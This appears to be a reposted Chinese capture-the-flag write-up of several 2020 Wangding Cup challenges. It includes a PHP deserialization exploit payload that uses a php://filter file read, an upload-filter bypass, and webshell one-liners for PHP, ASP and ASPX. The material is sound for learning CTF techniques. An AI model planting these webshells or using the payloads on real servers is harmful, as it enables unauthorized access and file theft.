2020网鼎杯大赛部分题解

大佬教程收集整理的这篇文章主要介绍了2020网鼎杯大赛部分题解，大佬教程大佬觉得挺不错的，现在分享给大家，也给大家做个参考。

1. boom

解压之后会发现是一个可以运行的程序

运行之后会出现@L_249_0@mD5乱码，这个我们通过解码会得到en5oy，然后我们输入进去会提示你进入下一关。

输入进去后我们发现方程组，我们解方程得到X=74，Y=68，Z=31

然后得到下列一元二次方程，这个方程我用的python代码算出来的得到89127561，但是我们输入进去后，会发现谈谈弹窗消失，然后我们去看这个程序的代码。

下面是部分代码截图，我们发现flag的拼接方式

拼接过后得到flag{en5oy_746831_89127561}。自此本题结束。

2. AreUserialz
没做之前不知道是反序列化，做完之后才知道，废话不说上酸菜。打开之后发现是一个页面，里面包含如下内容。

@H_607_63@<?PHP include("flag.PHP"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content = "Hello World!"; $this->process(); } public function process() { if($this->op == "1") { $this->write(); } else if($this->op == "2") { $res = $this->read(); $this->output($res); } else { $this->output("Bad Hacker!"); } } private function write() { if(isset($this->fileName) && isset($this->content)) { if(strlen((String)$this->content) > 100) { $this->output("Too long!"); die(); } $res = file_put_contents($this->filename, $this->content); if($res) $this->output("successful!"); else $this->output("Failed!"); } else { $this->output("Failed!"); } } private function read() { $res = ""; if(isset($this->fileName)) { $res = file_get_contents($this->fileName); } return $res; } private function output($s) { echo "[Result]: <br>"; echo $s; } function __destruct() { if($this->op === "2") $this->op = "1"; $this->content = ""; $this->process(); } } function is_valid($s) { for($i = 0; $i < strlen($s); $i++) if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125)) return false; return true; } if(isset($_GET{'str'})) { $str = (String)$_GET['str']; if(is_valid($str)) { $obj = unserialize($str); } }

我们先分析一下代码

我们知道这是一个is——valid（）函数，protected类型被序列化后包含不可见字符，我们通过将\00修改为空绕过。

已知已经存在了flag.PHP，op为1时是写文件，op为2时是读文件
但是在__destruct中，对op进行了过滤，可以根据===强弱进行绕过，设置op是int的2然后读取flag.PHP（cmdline+读取/web/config/httpd.conf）得知，但是is_valid()函数会过滤%00（前文提过），而类中的属性是protected，但是在PHP7.1+中，对属性类型不敏感，所以可以使用public绕过。

@H_607_63@?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:62:"PHP://filter/convert.base64-encode/resource=/web/html/flag.PHP";s:7:"content";N;}

提示此payload不是唯一。
然后我们在目标IP后跟payload，就可以得到一串数字。

@H_607_63@PDAnID0gImZsYWd7NGVhM2U3YzQtXXXXXXXXXXXXXXXXX==

通过经验知道是base64加密，所以我们解码就可以得到flag。

1. 签到题（太简单）

上来会有一个小游戏，反复答错之后发现提示和图片一一对应

例如SHellphish，举例说明

然后十五道题答完以后，会提示你

这个时候我们按下F12就可以看到flag。
4. wafUpload

不管他妈的是什么，给我疯狂burp。截取上传的数据包，对filename参数使用数组绕过，上传PHP.PHP,同时得到PHP.PHP路径。

然后就给我一句话木马，既然是upload，不用一句话木马和菜刀也太对不起观众了。

@H_607_63@PHP一句话木马：<?PHP @eval($_POST['key']);?> ASP一句话木马：<%eval request['key']%> ASPX一句话木马：<%@ Page Language="Jscript"%><%eval(request.Item["key"],"unsafe");%>

然后打开菜刀添加木马文件地址，就得到flag

夜深了，明天给妈妈做饭。睡之前来一把dota，嘿嘿嘿。各位晚安。

大佬总结

以上是大佬教程为你收集整理的2020网鼎杯大赛部分题解全部内容，希望文章能够帮你解决2020网鼎杯大赛部分题解所遇到的程序开发问题。

如果觉得大佬教程网站内容还不错，欢迎将大佬教程推荐给程序员好友。

本图文内容来源于网友网络收集整理提供，作为学习参考使用，版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ：384754419，请注明来意。